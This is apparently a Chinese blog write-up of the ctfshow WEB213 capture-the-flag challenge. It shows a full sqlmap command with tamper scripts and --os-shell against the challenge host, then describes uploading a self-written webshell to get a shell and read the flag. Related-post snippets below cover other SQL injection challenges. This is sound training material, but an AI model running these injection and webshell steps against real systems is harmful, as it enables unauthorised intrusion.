ctfshow WEB213 sqlmap

最新推荐文章于 2024-08-09 06:47:19 发布
最新推荐文章于 2024-08-09 06:47:19 发布
阅读量1.6k 收藏
点赞数
分类专栏: web安全 CTF_WEB 文章标签: php python web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48083470/article/details/120605888
版权

sqlmap 练习使用–os-shell 一键getshell

提示用os-shell getshell

在这里插入图片描述
前面的条件还是没变
在前一题的基础上加上 --os-shell

sqlmap -u http://2ed3ac47-a119-4626-8fb8-c4f6a16cdd6b.challenge.ctf.show:8080/api/index.php --referer ctf.show --safe-url http://2ed3ac47-a119-4626-8fb8-c4f6a16cdd6b.challenge.ctf.show:8080/api/getToken.php --safe-freq 1 --method PUT --headers content-type:text/plain --data id=1 --tamper space2comment.py,ctfshow_sql210_base64.py --dump --os-shell

在这里插入图片描述
选择服务器的类型 默认PHP
在这里插入图片描述
选择写入shell的目录
可以选直接选 1

发现跑出来失败
在这里插入图片描述
我们查阅他注入的过程
可以看到有个文件被上传成功了,我们浏览器访问一下
在这里插入图片描述
发现是一个上传文件的代码(sqlmap tql)
我们自己写一个shell 来尝试上传
在这里插入图片描述
发现上传成功,成功getshell,(估计是sqlmap的shell太大了还是怎样)
在这里插入图片描述
根目录下发现flag
在这里插入图片描述
直接读取
(刚开始以为是个目录,弄了一会,连上去看了才发现是个文件T_T)

无限键制
关注
专栏目录
ctfshow-web
qq_43618536的博客
07-15 891
ctfshow-web
【CTF】ctfshow——web
m0_52923241的博客
09-19 2592
ctfshow之web通关web签到题(so easy)web2:SQL注入漏洞(联合查询)web3:文件包含漏洞web4:文件包含漏洞(日志注入)web5:md5绕过web6:SQL注入漏洞(空格被过滤)web7:SQL注入漏洞(盲注&sqlmap)布尔盲注sqlmapweb8:SQL注入漏洞(布尔盲注)web9:robots.txt + SQL注入 + md5web10web11:web12 web签到题(so easy) base64解码点这里 F12,看到有一串字符串,base64解码
ctfshow-web入门-sql注入web201-web205)系统练习sqlmap的使用
最新发布
Welcome To Myon'Blog !
08-09 1371
开始系统练习sqlmap的使用。发现在访问 index.php 前都会先访问 getToken.php 追加 --safe-url 参数设置在测试目标地址前访问的安全链接,将 url 设置为 api/getToken.php,再加上 --safe-preq=1 表示访问 api/getToken.php 一次:
CTFSHOW-web
Makabakahaha的博客
07-01 915
phps文件类型主要由php组与php源关联。通常,php文件将由web服务器和php可执行文件解释,您将永远看不到php文件背后的代码。如果将文件扩展名设为.phps,配置正确的服务器将输出源代码的彩色格式版本,而不是通常生成的HTML。并非所有服务器都是这样配置的。也就是说,通过phps可以看到php代码未被解析的源代码所以拿到flagindex.phps是由于非正常关闭而产生的一个隐藏文件。
[ctfshow]web入门——命令执行(web72-web77)
ShenZ的博客
12-02 2441
ctfshow的命令执行(web72-77)
2024年网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 999
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2。
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 369
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7232
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
CTFshow sql注入 上篇(web221-253)
Kradress的博客
04-20 4750
目录前言思路题解总结 前言 输入源码 思路 ################################ 题解 ################################ 总结 …
2024年网安最全ctfshow-WEB-web9( MD5加密漏洞绕过)_ctfshow web9
2401_84264610的博客
05-01 875
进去以后就是一个登录界面, 盲猜是个SQL注入漏洞首先, 我们访问根目录下的 robots.txt 文件robots.txt是一个文本文件,同时也是一个协议,规定了爬虫访问的规则( 哪些文件可以爬取,哪些文件不可以爬取)从robots.txt文件的内容中可以发现, 作者给了提示, index.phps文件应该就是此关卡的源码文件接下来, 我们访问 /index.phps 文件, 将其下载到本地, 从源码中可以发现, SQL中使用了md5()函数加密, 我们可以利用MD5加密漏洞来绕过。
CTFSHOW_WEB入门web213
A的博客
08-07 1007
查了弄了好久才弄出来,PHPSESSID在F12储存里面找。下面是ctfshowweb213.py。
CTFshow web1
羽的博客
02-26 6101
题目地址:https://ctf.show 扫描后台拿到源码(www.zip)。打开login.php能禁的基本都禁干净了,登录页面貌似没有注入的可能。reg.php也是如此,所以注册页面也没可能了。剩下最后一个就是显示信息的页面了。这里可以看到在数据库中是把所有的字段(包括密码)都给查出来了,但是没有显示密码的地方。 我们可以利用?order=pwd来判断注册的密码与flag用户密码的大小(...
ctfshowweb213sql
jiangdie666的博客
06-11 182
web213 我看213没人上传wp,可能是师傅们觉得太简单。 -os-shell的使用,首先结合我们上面的脚本(y4师傅的tamper脚本)先检测注入点之后,直接跟上-os-shell。 #!/usr/bin/env python """ Author:Y4tacker """ from lib.core.compat import xrange from lib.core.enums import PRIORITY import base64 __priority__ = PRIORITY.LOW
CTFSHOW WEB 1-100
weixin_54558860的博客
11-20 4521
ctfshow web 1-100
CTFSHOW WEB_AK赛
羽的博客
07-31 3047
签到_观己 既然是签到,那我们就去猜一下flag的位置以及文件名 payload:file=/flag.txt 结束 如果猜不到呢,我们只能另寻他法了 1、尝试用伪协议中的data(具体伪协议的用法可参考https://blog.csdn.net/nzjdsds/article/details/82461043)发现allow_url_include没有开启。 2、让file=/var/log/nginx/access.log发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话。(其中日志中有客
ctfshow web入门sqlmap
jie_a的博客
06-09 971
web201 今天搞点轻松的,昨天晚上失眠了 基础命令 命令:python sqlmap.py xxxxxxx -u 指定注入点 –dbs 跑库名 –tables 跑表名 –columns 跑字段名 –dump 枚举数据 -D 指定库 -T 指定表 -C指定字段 –random-agent 每次访问切换请求头 防ban –delay=1 每次探测延时一秒 防ban –count 查看数据量 (某个表中的数据量) –level 1-5测试等级 level等级越高检测越详细 payload: sqlmap.py
Ctfshow web-web6 WP
qq_45427131的博客
05-12 428
Ctfshow web-we6 WP 进去看见一个login界面,看上去有点眼熟,好像做过,但是尝试之前做过的方法,回显始终是sql infect error,这样的回显表示输入的值中有非法字符,最后尝试下来是空格被顾虑了,用/**/代替 原来 union select 1,2,3 Web6: union/**/select/**/1,2,3 这样的话,传统艺能手工注入 判断显示位 获取当前连接的数据库 获取数据库中所有表的表名: Select table_name from informatio
CTF show WEB 1-4
羽的博客
02-15 7016
1.web签到题 直接源代码查看 2.web2 直接尝试万能密码,登陆成功 order by查找回显数 在3时正常回显,4是无回显,说明回显数为3 使用union select 联合查询爆库名 爆表名 爆字段 爆flag值 ...
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值